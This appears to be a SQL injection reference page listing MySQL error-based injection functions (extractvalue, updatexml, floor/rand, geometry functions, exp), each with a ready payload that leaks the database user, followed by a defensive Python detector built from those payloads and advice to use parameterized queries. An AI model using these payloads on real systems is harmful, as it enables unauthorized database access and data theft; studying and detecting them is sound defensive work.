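Error-based injection
Error-triggering functions (examples)
(1) extractvalue(arg1, arg2)
Returns the queried string from the target XML. Argument 1 is the XML document name, in string format; argument 2 is the string to query, in XPath format.
select * from jdy_admin where id = 1 and (extractvalue(1, concat(0x5c,(select user()))));
(2) updatexml(arg1, arg2, arg3)
Changes the value of the matching nodes in the document. Argument 1 is the XML document, argument 2 is an XPath string, and argument 3 is a string that replaces the matched data.
select * from jdy_admin where id = 1 and (updatexml(0x3a,concat(1,(select user())),1));
(3) floor(): it only raises an error when combined with count(), rand() and group by
select * from news where tid=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)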
Error-triggering functions
(1) geometrycollection()
select * from jay_admin where tid=1 and geometrycollection((select * from (select * from (select user())a)b));
(2) multipoint() function
(3) polygon() function
select * from jay_admin where id=1 and polygon((select * from(select * from(select user())a)b));
(4) multipolygon() function
select * from jay_admin where id=1 and multipolygon((select * from(select * from(select user())a)b));
(5) linestring() function
select * from jay_admin where id=1 and linestring((select * from(select * from(select user())a)b));
(6) multilinestring() function
select * from jay_admin where id=1 and multilinestring((select * from(select * from(select user())a)b));
(7) exp() function
select * from jay_admin where id=1 and exp(~(select * from(select user())a));
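A detection-side view of the functions listed above, as an added example that is not part of the original page: a Python heuristic that flags request parameter values containing these error-triggering constructs. The rule names, the normalize/detect helpers and the sample values are assumptions made for illustration, and the samples are constructed from the queries on this page.

```python
import re
from urllib.parse import unquote_plus

# Functions this page lists as error-based injection vectors in MySQL.
XML_FUNCS = "extractvalue|updatexml"
GEOM_FUNCS = ("geometrycollection|multipoint|polygon|multipolygon|"
              "linestring|multilinestring")
SUBQUERY = r"[^;]*?\(\s*select\b"  # a nested SELECT inside the arguments

RULES = {  # hypothetical rule names
    "xml_xpath_error": re.compile(rf"\b(?:{XML_FUNCS})\s*\({SUBQUERY}"),
    "geometry_error": re.compile(rf"\b(?:{GEOM_FUNCS})\s*\({SUBQUERY}"),
    "floor_rand_group_by": re.compile(
        r"count\s*\(.*floor\s*\(\s*rand\s*\(.*group\s+by", re.S),
    "exp_overflow": re.compile(r"\bexp\s*\(\s*~\s*\("),
}

def normalize(value):
    """Undo URL-encoding (up to two layers), inline comments, case and spacing."""
    for _ in range(2):
        value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).lower()

def detect(value):
    """Return the sorted names of the rules that match one parameter value."""
    text = normalize(value)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

# Constructed parameter values; the SQL fragments are the ones shown on this page.
SAMPLES = [
    "1",
    "1 and (extractvalue(1, concat(0x5c,(select user()))))",
    "1%20AND%20UpdateXML(0x3a,concat(1,(select%20user())),1)",
    "1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x "
    "from information_schema.tables group by x)a)",
    "1 and polygon((select * from(select * from(select user())a)b))",
    "1 and exp(~(select * from(select user())a))",
    "polygon shapefile export",  # benign: function name without a call
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(detect(sample) or "clean", "<-", sample[:60])
```

This is a log-triage heuristic, not a fix: the fix for every query on this page is a parameterized statement plus not returning database error text to the client.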